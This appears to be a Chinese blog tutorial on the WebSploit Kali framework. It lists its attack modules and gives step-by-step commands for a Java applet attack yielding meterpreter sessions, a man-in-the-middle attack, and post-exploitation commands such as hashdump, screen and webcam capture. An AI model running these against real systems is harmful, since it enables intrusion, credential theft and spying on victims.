kali自动化渗透神器websploit模块介绍

最新推荐文章于 2024-08-12 08:43:09 发布
最新推荐文章于 2024-08-12 08:43:09 发布
阅读量7.4k 收藏 25
点赞数 5
分类专栏: 工具使用 文章标签: websploit
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_37438418/article/details/78979792
版权

websploit

安装websploit

root@kali2:~# apt-get install websploit


root@kali2:~# websploit


db   d8b   db d88888b d8888b. .d8888. d8888b. db       .d88b.  d888888b d888888b 
88   I8I   88 88'     88  `8D 88'  YP 88  `8D 88      .8P  Y8.   `88'   `~~88~~' 
88   I8I   88 88ooooo 88oooY' `8bo.   88oodD' 88      88    88    88       88    
Y8   I8I   88 88~~~~~ 88~~~b.   `Y8b. 88~~~   88      88    88    88       88    
`8b d8'8b d8' 88.     88   8D db   8D 88      88booo. `8b  d8'   .88.      88    
 `8b8' `8d8'  Y88888P Y8888P' `8888Y' 88      Y88888P  `Y88P'  Y888888P    YP    


		--=[WebSploit Advanced MITM Framework
	+---**---==[Version :3.0.0
	+---**---==[Codename :Katana
	+---**---==[Available Modules : 20
		--=[Update Date : [r3.0.0-000 20.9.2014]


wsf > help
Commands		Description
---------------		----------------
set 			Set Value Of Options To Modules
scan			Scan Wifi (Wireless Modules)
stop			Stop Attack & Scan (Wireless Modules)
run 			Execute Module
use 			Select Module For Use
os 			Run Linux Commands(ex : os ifconfig)
back			Exit Current Module
show modules		Show Modules of Current Database
show options		Show Current Options Of Selected Module
upgrade			Get New Version
update			Update Websploit Framework 
about			About US

os clear  //清空屏幕
wsf > show modules
Web Modules			Description
-------------------		---------------------
web/apache_users		Scan Directory Of Apache Users
web/dir_scanner			Directory Scanner
web/wmap			Information Gathering From Victim Web Using (Metasploit Wmap)
web/pma				PHPMyAdmin Login Page Scanner
web/cloudflare_resolver		CloudFlare Resolver




Network Modules			Description
-------------------		---------------------
network/arp_dos			ARP Cache Denial Of Service Attack
network/mfod			Middle Finger Of Doom Attack
network/mitm			Man In The Middle Attack
network/mlitm			Man Left In The Middle Attack
network/webkiller		TCP Kill Attack
network/fakeupdate		Fake Update Attack Using DNS Spoof
network/arp_poisoner		Arp Poisoner




Exploit Modules			Description
-------------------		---------------------
exploit/autopwn			Metasploit Autopwn Service
exploit/browser_autopwn		Metasploit Browser Autopwn Service
exploit/java_applet		Java Applet Attack (Using HTML)




Wireless / Bluetooth Modules	Description
-------------------		---------------------
wifi/wifi_jammer		Wifi Jammer
wifi/wifi_dos			Wifi Dos Attack
wifi/wifi_honeypot		Wireless Honeypot(Fake AP)
wifi/mass_deauth		Mass Deauthentication Attack
bluetooth/bluetooth_pod		Bluetooth Ping Of Death Attack


- ------------------------------------------------------------------------------------
web/pma 模块  //测试网址路径
use web/pma
show opions
set target 测试网址
run
***********
开始启动对应配置和模块
检测phpmyadmin的路径
***********
- ------------------------------------------------------------------------------------
exploit/java applet 模块  //java小程序攻击,感觉和beef有点像
show options
set lhost 自己的ip
set interface wlan0
run


目标打开网址后,则可以监听
show sessions   查看链接的ip
sessions -i 1    选择第一个session
进入meterpreter的交互界面
相当于进入服务器了,可以任意提权
执行shell命令 
- ---------------------------------------------------------------------------------------
use network/mitm   //中间人攻击模块,特点:自动化   欺骗 嗅探
set router  你的网关
set target  目标ip地址
run
- ------------------------------------------------------------------------------------
exploit/browser_autopwn   模块
set ubterface wlan0
set interface wlan0

set lhost 本地ip



getsystem                                      #获取sytem权限
hashdump                                     #抓取账户密码hash值  ,然后用ophcrack破解
run vnc                                           #远程连接,监控屏幕
run webcam -p /var/www/          #监控摄像头
background                                   #不退出此meterpreter并返回msf



Wh0ale
关注
专栏目录
Kali Linux渗透测试技术详解
02-19
Kali Linux渗透测试技术详解本书由浅入深地介绍Kali Linux的各种渗透测试技术。书中选取了最核心和最基础的内容进行讲解,让读者能够掌握渗透测试的流程,而不会被高难度的内容所淹没。本书涉及面广,从基本的知识...
linux安装websploit工具,Kali Linux Web***测试之 WebSploit
weixin_32620855的博客
05-12 759
WebSploit简介:l一个综合性的,高级的中间人漏洞***框架。l由python编写的开源项目。主要用于远程扫描和分析系统漏洞,它可以非常快速容易和快速的发现系统中的漏洞,并用于深入分析。WebSploit由多个模块组成,具体如下:Autopwn – 使用Metasploit扫描和利用服务漏洞;wmap – 利用Metasploit wmap插件扫描和抓取目标站点;format i...
安全参透之旅第3章 Websploit工具
安全参透之旅
11-07 1327
Websploit是一个用来扫描和分析远程系统以找出漏洞的工具 1、运行Websploit 2、扫描模块 3、输入 use network/webkiller然后用set TARGER命令来设定攻击目标.
WebSploit 项目使用教程
最新发布
gitblog_00718的博客
08-12 309
WebSploit 项目使用教程 websploitWebsploit is a high level MITM framework项目地址:https://gitcode.com/gh_mirrors/we/websploit 1. 项目的目录结构及介绍 WebSploit 是一个高级的中间人攻击(MITM)框架,用于扫描和分析远程系统,以发现各种类型的漏洞。以下是 WebSploit 项目的...
探索网络安全的新篇章:Websploit 高级MITM框架
gitblog_00086的博客
05-15 329
探索网络安全的新篇章:Websploit 高级MITM框架 websploitWebsploit is a high level MITM framework项目地址:https://gitcode.com/gh_mirrors/we/websploit 在网络安全的世界里,渗透测试和漏洞评估是确保网络健康的关键环节。今天,我们要向您介绍的正是这样一款强大的工具——Websploit,一个高级...
Kali linux渗透测试系列————23、Kali linux 渗透攻击之服务器端攻击
热门推荐
Fly_鹏程万里
05-16 1万+
漏洞评估服务器端攻击即找出并利用服务器上的服务、端口和应用程序中的漏洞。举个例子,Web服务器都有多个攻击途径(Attack Vector)。它会运行一个操作系统,并运行各种各样的软件来提供Web功能。它会有很多打开的TCP端口。这些途径中的每一个都有可能找出一个攻击者能利用的漏洞,攻击者可以借此潜入系统并获取有用的信息。服务器上的许多协议都是人类可读的为加密文本处理的。在Kali中也带了较多用来...
Kali Linux渗透测试高级篇.rar
09-12
Kali Linux 是一款专门用于IT安全评估的Linux操作系统。目前作为被欢迎的Linux操作系统广泛用于安全评估项目中,其中提供600+安全工具,帮助安全人员更好的完成项目。课程主要内容:学习Kali Linux安全测试使用工具...
Kali Linux 安全渗透教程
06-13
Kali Linux 安全渗透教程
kali渗透
07-24
kali渗透kali渗透kali渗透kali渗透kali渗透kali渗透
精通Kali Linux 高级渗透测试2023版本,英文原版
07-12
The COVID-19 pandemic has changed the way the world operates. Organizations of all sizes have transformed themselves from having none or partial remote working to all of their employees ...
WebSploit Framework:WebSploit 是一个高级 MITM 框架-开源
05-30
WebSploit 高级 MITM 框架 [+]Autopwn - 从 Metasploit 用于扫描和利用目标服务 [+]wmap - 从 Metasploit wmap 插件中使用的扫描、爬虫目标 [+]format infector - 将反向和绑定有效载荷注入文件格式 [+]phpmyadmin Scanner [+]CloudFlare resolver [+]LFI Bypasser [+]Apache Users Scanner [+]Dir Bruter [+]admin finder [+]MLITM Attack - Man Left In The Middle, XSS Phishing Attacks [+]MITM - Man In The Middle Attack [+]Java Applet Attack [+]MFOD Attack Vector [+]ARP Dos Attack [+]Web Killer Attack [+]Fake Update Attack [+]Fake Access point Attack [+]Wifi Honeypo
WebSploit Framework V.2.0.3.tar.gz
12-25
WebSploit是一个开源安全扫描和分析系统。
第十二课-websploit.ppt
02-22
网络攻防相关,欢迎下载。网络攻防相关,欢迎下载。网络攻防相关,欢迎下载。网络攻防相关,欢迎下载。网络攻防相关,欢迎下载。
kali的实战渗透
12-14
写的是kali的实战渗透,其中有讲msf渗透kali基础命令使用等等等,非常多
KaliLinux安全渗透教程(完整版)
04-26
第9章 无线网络渗透测试 9.1 无线网络嗅探工具Kismet 9.2 使用Aircrack-ng工具破解无线网络 9.3 Gerix Wifi Cracker破解无线网络 9.4 使用Wifite破解无线网络 9.5 使用Easy-Creds工具攻击无线网络 9.6 在树莓派上...
linux安装websploit工具,使用Docker构建Web渗透测试工具容器
weixin_42410443的博客
05-12 220
Docker是世界领先的软件集装化平台,针对不同的渗透测试类型,我们完全可以使用Docker创建相应的环境。有了Docker容器,你可以把测试环境放到U盘或者云端。Docker是什么Docker是一个开源的技术,在软件容器中,你可以创建、运行、测试和部署应用程序。Dcoker可以让你在任何环境中快速、可靠、稳定地部署应用程序。容器具有可移植、方便、快速的优点。使用Docker,我们可以创建一个映...
websploit获取管理员后台地址
weixin_33811539的博客
05-19 356
1, use web/dir_scanner 2, set TARGET http://www.****.com 3, run SOURCE: https://sourceforge.net/projects/websploit/     WebSploit Advanced MITM Framework [+]Autopwn – Used From Metasploit For Scan a...
WiFi攻击进阶版——Deauth攻击
02-09 3433
一、背景介绍: 在之前我们做过Wi-Fi定位劫持实验,其实有关Wi-Fi的攻击方式还有很多,而且其中的大多数需要的设备和操作都很简单。今天就再介绍一种破坏性更强、隐蔽性更高的攻击方式——取消验证洪水攻击。 首先了解一下什么是取消验证洪水攻击:国际上称之为De-authentication...
KaliLinux安全渗透教程:内部资料介绍及学习指南
"该资源为《加载额外组件-常用算法程序集第四版(c++语言描述)pdf版》的一部分,内容涉及Kali Linux的安全渗透教程,着重介绍了如何配置系统、加载额外组件以及进行网络配置。此外,还包含了Kali Linux渗透测试的...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值